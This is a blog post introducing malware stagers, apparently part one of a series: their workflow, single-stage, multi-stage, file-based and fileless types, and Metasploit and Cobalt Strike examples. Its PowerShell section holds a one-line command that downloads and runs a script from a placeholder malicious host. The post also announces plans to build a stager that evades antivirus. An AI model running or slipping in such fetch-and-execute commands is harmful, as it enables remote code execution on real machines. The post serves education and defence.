780 words
4 minutes
Stagers - 101
2025-02-28
Offensive Security
Malware
/
Stager
/
MalDev

Stagers 101#

Prologue:#

In the world of cybersecurity, attackers rarely drop their full payload upfront. Instead, they rely on stagers—lightweight, initial-stage programs designed to retrieve and execute the actual malicious payload.

In this Stagers 101 series, we will dive deep into how stagers work, why they are so effective, and how defenders can detect and counter them. We’ll explore how stagers are built, how to create YARA rules to signature them, and even discuss potential behavioral detection methods.

This is Part 1 of the series. As we progress, we will develop a powerful stager capable of evading modern antivirus solutions like Windows Defender with increasing level of stealth.

1. What Are Stagers?#

Stagers are designed to establish communication between the compromised system and the attacker’s Command and Control (C2) infrastructure. Once the connection is established, they retrieve and execute the main payload which we call as the STAGE.

Key Characteristics of Stagers:

  • Lightweight: Minimal functionality to avoid detection.
  • Modular: Often used in multi-stage attacks.
  • Stealthy: Uses encrypted or obfuscated channels for payload retrieval.
  • Adaptable: Can dynamically update payloads from the C2.

2. Workflow of Stagers#

Step 1: Initial Infection#

The attacker delivers the stager through:

  • Phishing emails (e.g., malicious attachments like .exe, .js, or .docm).
  • Drive-by downloads via compromised websites.
  • Exploitation of vulnerabilities in software or systems.

Step 2: Stager Execution#

Upon execution, the stager:

  • Establishes a connection with the attacker’s C2 server.
  • Sends basic system information to the C2 (e.g., OS version, IP, and hostname).

Step 3: Payload Retrieval#

The C2 server sends the main payload (e.g., ransomware, spyware, or trojans) back to the compromised system.

Step 4: Payload Execution#

The stager executes the payload, initiating further malicious activities, such as:

  • Data exfiltration.
  • Privilege escalation.
  • Network propagation.
  • Persistence
  • Credential Theft

3. Types of Stagers#

There are different types of stagers based on the tiered architecture a malware author wants to implement. This is very similar to a rocket launch where there are multiple boosters to deliver the actual payload into space.

3.1 Single-Stage Stager#

Think of the single-stage stager as a firework rocket—all components packed into one. It’s a straightforward approach where the stager and the final payload are bundled into a single executable file. This is the simplests form in which a malware can be distributed, often seen in standalone malware distributed as .exe files. It’s direct, but also easily detectable.

3.2 Multi-Stage Stager#

Now, picture a real space rocket. It doesn’t go all at once. It sheds boosters as it climbs. That’s a multi-stage stager. The first stage is a small, unassuming file—like a tiny booster rocket. It’s just there to download the next stage, which then brings in the main payload. It’s like a chain reaction, making it harder to track. These are the “step by step” deliveries.

  • Similarly malwares operates in phases:
    • First stage downloads and executes the second stage.
    • The second stage fetches the primary malware.
  • Example: Exploit frameworks like Metasploit use multi-stage payloads.

3.3 File-Based Stager#

Imagine a rocket blasting off, leaving a big, visible trail of smoke. That’s kind of what file-based stagers do. They leave “smoke” in the form of files saved onto your computer’s hard drive. These files are often disguised as something innocent, like a regular document or a picture. Think about those sneaky .js or .vbs files hiding inside phishing emails.

These files are like the first booster rocket in a launch. They’re designed to do a small, initial job: set the stage for the main, much more harmful payload to come crashing down. They’re the ones that get the ball rolling.

3.4 Fileless Stager#

Forget packages on the doorstep. Imagine a drone that beams the delivery straight into your living room, no landing, no noise, nothing. That’s a fileless stager for you. It’s like a ghost delivery, happening entirely inside your computer’s memory.

See, regular malware drops files onto your hard drive, like leaving a calling card. But fileless stagers? They operate in the shadows, running their code directly in your computer’s RAM. That means no files to scan, no evidence left behind.

Think of those tricky PowerShell commands you might have heard about. They’re a prime example. They can execute malicious code without ever saving anything to your hard drive. It’s like a magic trick, where the malware appears and disappears without leaving a single clue.

4. Stager Variants in the Wild#

Metasploit Stagers#

Metasploit, a widely used penetration testing tool, provides several stagers:

  • windows/meterpreter/reverse_tcp: Establishes a reverse TCP connection to the attacker.
  • linux/x64/meterpreter_reverse_https: Connects back to the C2 using HTTPS for encrypted communication.

Cobalt Strike Beacons#

  • Cobalt Strike uses “beacons” as advanced stagers to execute commands and retrieve payloads from its C2.

PowerShell Stagers#

  • Common in fileless attacks.

  • Example:

    IEX (New-Object Net.WebClient).DownloadString('http://malicious-server.com/stager.ps1')

5. How Stager Operates#

  • User Interaction: The user opens a malicious attachment (e.g., invoice.docm).
  • Stager Execution: The stager communicates with the C2.
  • Payload Retrieval: The C2 sends the main malware.
  • Execution: Malware launches its attack.

image.png

6. Epilogue#

Stagers are a powerful yet stealthy component in modern cyberattacks. Understanding their operation and characteristics is crucial for building effective defenses.

Stagers - 101
https://blog.retracelabs.io/posts/stager101/stagers-101/
Author
Retrace Labs
Published at
2025-02-28

© 2025 Retrace Labs. All Rights Reserved.